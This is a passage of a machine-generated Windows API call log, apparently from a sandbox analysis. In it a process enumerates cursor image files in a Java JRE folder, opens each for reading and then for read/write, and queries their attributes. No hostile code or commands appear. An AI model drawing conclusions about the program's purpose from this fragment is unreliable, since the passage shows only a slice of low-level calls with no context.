Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 80 [0097.108] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.108] GetFileType (hFile=0x33c) returned 0x1 [0097.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0097.108] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.108] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.109] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.109] CloseHandle (hObject=0x33c) returned 1 [0097.109] AreFileApisANSI () returned 1 [0097.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0097.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0097.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8d220, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 80 [0097.109] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.109] GetFileType (hFile=0x33c) returned 0x1 [0097.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0097.109] CloseHandle (hObject=0x33c) returned 1 [0097.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.110] AreFileApisANSI () returned 1 [0097.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0097.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0097.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8ca40, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 80 [0097.111] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99)) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0097.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.111] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="win32_LinkDrop32x32.gif", cAlternateFileName="WIN32_~3.GIF")) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0097.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0097.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0097.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.112] AreFileApisANSI () returned 1 [0097.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif", lpUsedDefaultChar=0x0) returned 78 [0097.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0097.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.112] AreFileApisANSI () returned 1 [0097.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d178 [0097.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8d178, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 78 [0097.112] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.112] GetFileType (hFile=0x33c) returned 0x1 [0097.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0097.113] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.113] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.113] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.113] CloseHandle (hObject=0x33c) returned 1 [0097.113] AreFileApisANSI () returned 1 [0097.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8ced8 [0097.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8ced8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 78 [0097.113] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.113] GetFileType (hFile=0x33c) returned 0x1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0097.114] CloseHandle (hObject=0x33c) returned 1 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0097.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.115] AreFileApisANSI () returned 1 [0097.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c650 [0097.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8c650, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 78 [0097.115] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa8)) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0097.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.115] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="win32_LinkNoDrop32x32.gif", cAlternateFileName="WIN32_~4.GIF")) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0097.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0097.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0097.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0097.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.116] 